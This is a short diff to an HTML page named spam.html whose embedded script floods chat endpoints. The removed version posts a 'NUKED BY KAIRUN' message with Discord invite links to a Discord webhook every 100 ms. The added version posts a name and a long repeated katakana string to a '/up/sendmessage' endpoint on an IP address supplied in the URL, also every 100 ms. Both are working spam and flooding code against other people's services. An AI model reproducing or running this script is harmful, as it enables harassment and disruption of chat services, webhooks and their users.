--- a/spam.html
+++ b/spam.html
@@ -12,15 +12,16 @@
     <script>
         let param = new URLSearchParams(window.location.search);
         setInterval(() => {
-               fetch("https://discord.com/api/webhooks/"+param.get("id")+"/"+param.get("token"), {
-                    method: "POST",
-                    body: JSON.stringify({
-                    content: "https://kairun.rasky1.com\nNUKED BY KAIRUN!!\nhttps://kairun.jp/DC\n\"https://discord.gg/TwQpmmgJ7k\"\n\"https://discord.gg/abj\"\n<@949479338275913799>"
-                    }),
-                    headers: {
-                        "Content-Type": "application/json"
-                    }
-                })
+               fetch(`http://${param.get("ip")}/up/sendmessage`, {
+        method: "POST",
+        headers: {
+            'Content-Type': 'application/json; charset=UTF-8',
+        },
+        body: JSON.stringify({
+            name: "かいるんるん",
+            message: "§l" + "ﾃﾞｭｱｳﾝ".repeat(50)
+        })
+    })
         }, 100);
     </script>
 </body>
